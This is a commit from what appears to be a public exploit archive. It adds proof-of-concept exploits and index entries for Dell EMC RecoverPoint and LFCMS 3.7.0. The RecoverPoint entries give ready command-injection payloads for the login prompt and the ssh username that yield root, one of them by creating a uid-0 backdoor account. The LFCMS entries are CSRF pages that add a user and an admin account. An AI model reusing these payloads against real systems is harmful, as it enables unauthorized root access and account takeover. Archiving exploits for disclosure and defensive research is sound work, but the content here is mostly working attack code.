DB: 2018-06-22

4 changes to exploits/shellcodes Dell EMC RecoverPoint < 5.1.2 - Local Root Command Execution Dell EMC RecoverPoint < 5.1.2 - Remote Root Command Execution VideoInsight WebClient 5 - SQL Injection LFCMS 3.7.0 - Cross-Site Request Forgery (Add User) LFCMS 3.7.0 - Cross-Site Request Forgery (Add Admin)
2018-06-22 05:01:45 +00:00 · 2018-06-22 05:01:45 +00:00 · 11ecb9c031
commit 11ecb9c031
parent ac267cb298
5 changed files with 109 additions and 1 deletions
--- a/exploits/linux/local/44920.txt
+++ b/exploits/linux/local/44920.txt
@ -0,0 +1,23 @@
+# Exploit Title: Dell EMC RecoverPoint < 5.1.2 - Local Root Command Execution
+# Date: 2018-06-21
+# Exploit Author: Paul Taylor
+# Version: All versions before RP 5.1.2, and all versions before RP4VMs 5.1.1.3
+# Vendor Advisory: DSA-2018-095
+# Vendor KB: https://support.emc.com/kb/521234
+# Github: https://github.com/bao7uo/dell-emc_recoverpoint
+# Website: https://www.foregenix.com/blog/foregenix-identify-multiple-dellemc-recoverpoint-zero-day-vulnerabilities
+# Tested on: RP4VMs 5.1.1.2, RP 5.1.SP1.P2
+# CVE: CVE-2018-1235
+ 
+# 1. Description
+# An OS command injection vulnerability exists in the mechanism which processes usernames 
+# which are presented for authentication, allowing unauthenticated root access 
+# via tty console login.
+ 
+# 2. Proof of Concept
+# Inject into local tty console login prompt
+
+recoverpoint login: $(bash > &2)
+root@recoverpoint:/# id
+uid=0(root) gid=0(root) groups=0(root)
+root@recoverpoint:/#
--- a/exploits/linux/remote/44921.txt
+++ b/exploits/linux/remote/44921.txt
@ -0,0 +1,28 @@
+# Exploit Title: Dell EMC RecoverPoint < 5.1.2 - Remote Root Command Execution
+# Date: 2018-06-21
+# Version: All versions before RP 5.1.2, and all versions before RP4VMs 5.1.1.3
+# Exploit Author: Paul Taylor
+# Vendor Advisory: DSA-2018-095
+# Vendor KB: https://support.emc.com/kb/521234
+# Github: https://github.com/bao7uo/dell-emc_recoverpoint
+# Website: https://www.foregenix.com/blog/foregenix-identify-multiple-dellemc-recoverpoint-zero-day-vulnerabilities
+# Tested on: RP4VMs 5.1.1.2, RP 5.1.SP1.P2
+# CVE: CVE-2018-1235
+ 
+# 1. Description
+# An OS command injection vulnerability exists in the mechanism which processes usernames 
+# which are presented for authentication, allowing unauthenticated root access via 
+# the ssh service.
+ 
+# 2. Proof of Concept
+# Inject into ssh username.
+# N.B. combined length of new username+password is limited to 21 due to injection length limitations
+
+$ ssh '$(useradd -ou0 -g0 bao7uo -p`openssl passwd -1 Secret123`)'@192.168.57.3
+Password: ^C
+$ ssh bao7uo@192.168.57.3
+Password: Secret123
+Could not chdir to home directory /home/bao7uo: No such file or directory
+root@recoverpoint:/# id
+uid=0(root) gid=0(root) groups=0(root)
+root@recoverpoint:/#
--- a/exploits/php/webapps/44918.html
+++ b/exploits/php/webapps/44918.html
@ -0,0 +1,27 @@
+# Exploit Title: A CSRF vulnerability exists in LFCMS_3.7.0: users can be added arbitrarily.
+# Date: 2018-06-20
+# Exploit Author: bay0net
+# Vendor Homepage: https://www.cnblogs.com/v1vvwv/p/9203740.html
+# Software Link: http://www.lfdycms.com/home/down/index/id/26.html
+# Version: 3.7.0
+# CVE : CVE-2018-12602
+
+
+A CSRF vulnerability exists in LFCMS_3.7.0: users can be added arbitrarily.
+
+
+The payload for attack is as follows.
+
+
+<html>
+  <body>
+  <script>history.pushState('', '', '/')</script>
+    <form action="http://10.211.55.17/lfdycms3.7.0/admin.php?s=/Users/add.html" method="POST">
+      <input type="hidden" name="username" value="test222" />
+      <input type="hidden" name="email" value="test2@qq.com" />
+      <input type="hidden" name="password" value="test222" />
+      <input type="hidden" name="repassword" value="test222" />
+      <input type="submit" value="Submit request" />
+    </form>
+  </body>
+</html>
--- a/exploits/php/webapps/44919.html
+++ b/exploits/php/webapps/44919.html
@ -0,0 +1,26 @@
+# Exploit Title: A CSRF vulnerability exists in LFCMS_3.7.0: administrator account can be added arbitrarily.
+# Date: 2018-06-20
+# Exploit Author: bay0net
+# Vendor Homepage: https://www.cnblogs.com/v1vvwv/p/9203899.html
+# Software Link: http://www.lfdycms.com/home/down/index/id/26.html
+# Version: 3.7.0
+# CVE : CVE-2018-12603
+
+
+A CSRF vulnerability exists in LFCMS_3.7.0:  administrator account can be added arbitrarily.
+
+
+The payload for attack is as follows.
+
+
+<html>
+  <body>
+  <script>history.pushState('', '', '/')</script>
+    <form action="http://10.211.55.17/lfdycms3.7.0/admin.php?s=/Member/add.html" method="POST">
+      <input type="hidden" name="username" value="admin2" />
+      <input type="hidden" name="password" value="admin2" />
+      <input type="hidden" name="repassword" value="admin2" />
+      <input type="submit" value="Submit request" />
+    </form>
+  </body>
+</html>
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -9791,6 +9791,7 @@ id,file,description,date,author,type,platform,port
 44903,exploits/windows/local/44903.py,"Audiograbber 1.83 - Local Buffer Overflow (SEH)",2018-06-18,"Dennis 'dhn' Herrmann",local,windows,
 44904,exploits/linux/local/44904.py,"Redis-cli < 5.0 - Buffer Overflow (PoC)",2018-06-18,"Fakhri Zulkifli",local,linux,
 44906,exploits/windows/local/44906.txt,"Microsoft COM for Windows - Privilege Escalation",2018-06-18,"Code White",local,windows,
+44920,exploits/linux/local/44920.txt,"Dell EMC RecoverPoint < 5.1.2 - Local Root Command Execution",2018-06-21,"Paul Taylor",local,linux,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -16579,6 +16580,7 @@ id,file,description,date,author,type,platform,port
 44829,exploits/linux/remote/44829.py,"CyberArk < 10 - Memory Disclosure",2018-06-04,"Thomas Zuk",remote,linux,
 44836,exploits/ios/remote/44836.rb,"WebKit - not_number defineProperties UAF (Metasploit)",2018-06-05,Metasploit,remote,ios,
 44890,exploits/linux/remote/44890.rb,"DHCP Client - Command Injection 'DynoRoot' (Metasploit)",2018-06-13,Metasploit,remote,linux,
+44921,exploits/linux/remote/44921.txt,"Dell EMC RecoverPoint < 5.1.2 - Remote Root Command Execution",2018-06-21,"Paul Taylor",remote,linux,22
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@ -39571,4 +39573,6 @@ id,file,description,date,author,type,platform,port
 44912,exploits/hardware/webapps/44912.py,"TP-Link TL-WA850RE - Remote Command Execution",2018-06-20,yoresongo,webapps,hardware,
 44913,exploits/linux/webapps/44913.py,"Apache CouchDB < 2.1.0 - Remote Code Execution",2018-06-20,"Cody Zacharias",webapps,linux,
 44916,exploits/multiple/webapps/44916.rb,"IPConfigure Orchid VMS 2.0.5 - Directory Traversal Information Disclosure (Metasploit)",2018-06-20,Nettitude,webapps,multiple,80
-44917,exploits/windows/webapps/44917.txt,"VideoInsight WebClient 5 - SQL Injection",2018-06-20,vosec,webapps,windows,
+44917,exploits/windows/webapps/44917.txt,"VideoInsight WebClient 5 - SQL Injection",2018-06-20,vosec,webapps,windows,80
+44918,exploits/php/webapps/44918.html,"LFCMS 3.7.0 - Cross-Site Request Forgery (Add User)",2018-06-21,bay0net,webapps,php,80
+44919,exploits/php/webapps/44919.html,"LFCMS 3.7.0 - Cross-Site Request Forgery (Add Admin)",2018-06-21,bay0net,webapps,php,80